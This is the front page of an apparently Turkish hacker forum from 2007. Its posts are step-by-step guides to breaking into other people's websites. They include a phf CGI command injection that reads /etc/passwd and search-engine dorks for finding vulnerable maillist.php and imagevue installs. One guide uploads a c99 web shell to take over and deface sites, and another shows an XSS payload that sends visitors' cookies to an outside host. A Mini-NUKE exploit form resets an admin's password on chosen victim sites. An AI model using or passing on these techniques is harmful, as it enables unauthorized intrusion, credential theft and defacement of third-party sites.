CLUB HACKER
CLUB HACKER [HACKER GENCLIK 19]
|
|
| | | Somee Hack |  C.tesi Ekim 06, 2007 8:37 pm tarafından Admin | Aşağıda vereceğim kodu Somee Sitelerinin sonuna "www.hedefsite.somee.com/db/forum.mdb" şeklinde yapıştırıp enterleyiniz karşınıza sitenin mdb si çıkacak bunu accessede açıp mdb işini kırarak siteye admin olarak girebilirsiniz
Kod:/db/forum.mdb
| | Yorum: 0 |
| Http Üzerinden Şifre Alma | | C.tesi Ekim 06, 2007 8:14 pm tarafından Admin | Mantik : phf sistemlerde bulunan bir
acikdir ve bu acik sayesinde sisteme
web uzerinden baglanip shellde bazi
komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd,
ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
Ozellikler : phf sayesinde her hangi
bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve k
irabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |~ eNJOy!
Kullanim : phf nin kullanimi basitdir,
sizi fazla zorlamaz.
browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini
browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlar
sistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini
goruntuler burda %20 bosluk oldugunu
belirtir yani :
…
[ Okuma komple ] | | Yorum: 0 |
| Mail İLe Hack | | C.tesi Ekim 06, 2007 8:12 pm tarafından Admin | EVET ARADAŞLAR ŞİMDİ SİZE KISA VE MANTIKLI BİR MAİLLİS ÇALMA BE ÇALDIĞIMZ MAİLLİS İLE SİTE HACKLEMEYİ ANLATACAM ..
İLK ÖNCE www.google.com A GİRİN
VE ŞU EXPLOİT İ YAZIN maillist.php?action=admin
KARŞINIZA BİRÇOK SİTE ÇIKAR AMA HEPSİNİ HACKLEMEYEZSİNİ ÇÜNKÜ ADMİNLER DOSYA DOSYA OLARAK ALMIŞLARDIR YANİ EK DOSYALAR EKLEYEREK SAKLAMAYA ÇALIŞIRLAR .. AMA DEDİĞİ GİBİ
BUNLARI DENİYEBİLİRSİNİZ.. KLASÖRLER VARSA
mail.php
maillist.php
maillist.php?action=admin
mailist/maillist.php?action=admin
mail/maillist.php?action=admin
list/maillist.php?action=admin
EVET DİYELİM SİTE BULDUK
http://www.kurbansitesi.com/maillist.php?action=admin
LİNK İLE SİTE ADINI YAZARIZ VE KARŞIMIZA KULLANICI ADI VE ŞİFRE SONRA BİR PENCERE GELİR .
İŞTE BURDA ŞİFREYİ NASIL MI ALACAZ İŞTE SORU BU MU ?
SORU ÇOK KOLAY
YAPMAK GEREKE ŞEY YUKARIDAKİ ADRESİ SİLİP YANİ
http://www.kurbansitesi.com/maillist.php?action=admin
SİLİP BÖYLE YAPMAK
…
[ Okuma komple ] | | Yorum: 0 |
| imagevue HACK | | Cuma Ekim 05, 2007 10:47 pm tarafından Admin | Evet arkadaşlar bugünki açıkğımızın ismi "imagevue "
Google açıyoruz ve şunu aratıyoruz imagevue gallery
Evet önümüze bir sürü site geldi şimdi teker teker bunları deneyicez açığı olan siteleri bulucaz
1-site açıldıktan sonra sitenin sonuna
exploitimiz-----> admin/upload.php?path= ekliyoruz
açılan sitenin ismi bu şekil olacak www.siteadı.com/gallery(veya images yani yer ismi)
www.siteadı.com/gallery/admin/upload.php?path=
2-Sıra geldi shellimizi upload etmeye ben c99 shell kullanıyorum upload sekmesini tıklayıp c99 shellimizi upload ediyoruz
Eğer shellimiz upload edilmişse çıkan yazı c99.php upload diyecek ve işte shellimizi upload ettik sıra geldi admin paneline sızmaya
3-Sitenin sonuna şu şekilde yazacaz
www.siteadı.com/gallery/c99.php diyip enterlıyoruz işte paneldeyiz
Yeşil yazılı olan yerlere yazma iznimiz vardır yani isteğimiz herşeyi yapabiliriz indeximizi basabiliriz artık site sizin elinizde istediğinizi
[ Okuma komple ] | | Yorum: 0 |
| İndex Yapma Olayı!!! | | Cuma Ekim 05, 2007 10:34 pm tarafından Admin | ===INDEX===
ARKADASLAR INDEX HACKIN BASINDA GELIR
BU YUZDEN HER HACKERIN KENDINE OZGU BIR INDEXI VARDIR.
INDEX ICIN HTML KOD BILGISI GEREKIR.
HTML KODLARINI www.hazirkod.com ADRESINDEN ALABILIRSINIZ.
BU KODLARI NOT DEFTERINE KOPYALAYIP "Dosya" 'dan FARKLI KAYDETI SECIM index.htm yada index.html (default.htm,default.html bu degisebilir) olarak kaydedin ARTIK SIZINDE BIR INDEXINIZ OLACAK
| | Yorum: 0 |
| Ip den Karşı PC ye gir | | Cuma Ekim 05, 2007 10:34 pm tarafından Admin | Başlat-Çalıştır- mstsc
Çıkan pencereden karşı Pc nin İp numarasını yazıyoruz ve bağlanıyoruz. Hedef PC ye bağlandıktan sonra istediğiniz herşeyi yapabilirsiniz. Bu yöntemin essantial net tools yönteminden farkı, essantial net tools da sadece payşaımına izin verilen yerlere sızabiliyorsunuz. Ancak bu yöntemde hedef pc yi kendi pc niz gibi kullanabilirsiniz.
Eğer hala bağlanamıyorsanız sizin yada karşı PC nin modeminde bu işlemi yapmak için açık port yoktur demektir. Yeni bir port açtıktan sonra işlemi yeniden deneyebilirsiniz...
ALINTIDIR..
| | Yorum: 0 |
| En İyi Hack Yöntemi Exploit | | Cuma Ekim 05, 2007 10:32 pm tarafından Admin | EN İYİ WEB HACK YÖNTEMİ OLAN EXPLOİT KULLANMAYI ANLATACAĞIM ŞİMDİ
ÖNCELİKLE SALDIRACAĞIMIZ SİTEDEYE UYGUN EXPLOİT BULMAMIZ GEREKİYOR BU YÜZDEN SİTEDEKİ AÇIKLARI ARATMALIYIZ.BENİM TAVSİYEM SHADOW SECURİTY SCANNER EN İYİLERDEN BİRİ ŞİMDİ ONU YÜKLÜYORUZ.http://shadow-security-scanner.softo...download/41850
İNDİRME BİTTİKTEN SONRA BİLGİSAYARIMIZA KURUYORUZ VE PROGRAMI AÇIYORUZ VE YANDA SCANNER YAZIYOR ORAYA TIKLIYORUZ
VE KARŞIMIZA BİR EKRAN ÇIKIYOR ORDA COMPLETE SCAN İ SEÇİYORUZ VE NEXT DİYORUZ.
NEXT DEDİKTEN SONRAKİ EKRANA AÇIKLARINI TARATACAĞIMIZ SİTEYİ YAZIYORUZ BURAYA VE NEXT DİYORUZ.
KARŞIMIZA PROGRAMIN ANA YÜZÜ ÇIKIYOR START DİYORUZ VE TARAMA İŞLEMİ BAŞLIYOR.
TARAMA BİTİNCE YUKARIDA VULNEREABİLİTİESSEKMESİNE GİRİYORUZ VE AÇIKLARI ÇIKIYOR SİTENİN.KIRMIZI TEHLİKELİ AÇIKLARDIR BİZ BUNLARI KULLANACAĞIZ.NASILMI? securityfocus.com DA BU AÇIĞIN LİNKİ, ORAYA TIKLIYORUZ VE UYGUN EXPLOİT ÇIKIYOR KARŞIMIZA.
ŞİMDİ İKİ İHTİMAL VAR.EXPLOİTLER İKİ DİLDE YAZILIR BİRİ PERL DİLİ …
[ Okuma komple ] | | Yorum: 0 |
| XSS COOKİE ÇALMA İLE WEB HACK | | Cuma Ekim 05, 2007 10:31 pm tarafından Admin | Bu dökümanda size XSS ile bir hack yöntemi anlatacağım öncelikle işin mantığına değinmek istiyorum. Küçük bir javascript koduyla, kodun bulunduğu mevcut sayfaya ait cookie'yi çalabiliyoruz. Peki bu bizim ne işimize yarayacak? Ekleyeceğimiz bir php mail yollama koduyla elde edilen cookie değeri belirttiğimiz maile yollanabilir. Böylece o cookie değerini bizim o mevcut site uzerinde sahip olduğumuz cookie ile değiştirebiliriz. Yani eğer adminin cookie'yi çalarsak ve o sitedeki kendi cookiemiz ile değiştirirsek. Siteyi açtığımız an admin olarak giriş yapmış oluruz.
Buradaki sorun ise sadece mevcut sayfanın cookie değerini alabilmesi, yani www.hedefsite.com uzerinde bu kodu yazabilmemiz lazım. Imzasında veya herhangi bir yerinde html kodu serbest olan forumda aşşağıdaki kodu giriyoruz:
window.navigate("http://www.sitem.com/cookieyolla.php?data="+document·cookie)
Not: Bu kodu başka bir şeyin arkasına gizleyebilirsiniz, örneğin imzanızda html sayesinde kayan …
[ Okuma komple ] | | Yorum: 0 |
| Mini-NUKE 2 | | Cuma Ekim 05, 2007 10:31 pm tarafından Admin | <html>
<title>Minifucker Vs3 Powered techno_kartallar</title>
<bOdy>
<form>
| Bu exploit techno_kartallar tarafından Cyber-Warrior.org için dezenlenmiştir. |
| Sifreyi Degistir |
| Sifre: |
<input> |
| Sifre Tekrar: |
<input>
|
<p><input><input></p>
<p>
</p>
</form>
</html>
Şimdi arkadaşlar bu kodu alıp not defterine yapıştırıyorsunuz ve google.com’a girip şu aramayı yapıyorsunu= Copyright © 2004-2005 Bu site Mini-NUKE v1.8 kullanılarak hazırlanmıştır.Mini-NUKE ücretsiz bir uygulamadır.
Bu aramayı yaptıktan sonra karşınıza çıkan kurbanlardan bi tane kendinize seçin sonra kurbanın adresini alıp yukarıda verdiğim "kurbansitemiz.com" yerine yazıp " minifucker.htm diye kaydedin başka bişey değiştirmeyin. sonra kaydettiğimiz htm yi açın ve kurban sitedeki adminin adnını yazın değiştireceğiniz şifreyi yazın ve sorgula deyin sonra adminsiniz
Not …
[ Okuma komple ] | | Yorum: 0 |
| | Kimler hatta? | Toplam 1 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 1 Misafir Yok Sitede bugüne kadar en çok 9 kişi C.tesi Ara. 27, 2008 9:31 pm tarihinde online oldu. |
| Istatistikler | Toplam 6 kayıtlı kullanıcımız var
Son kaydolan kullanıcımız: DIGITALL
Kullanıcılarımız toplam 35 mesaj attılar bunda 35 konu
|
|
| |
|
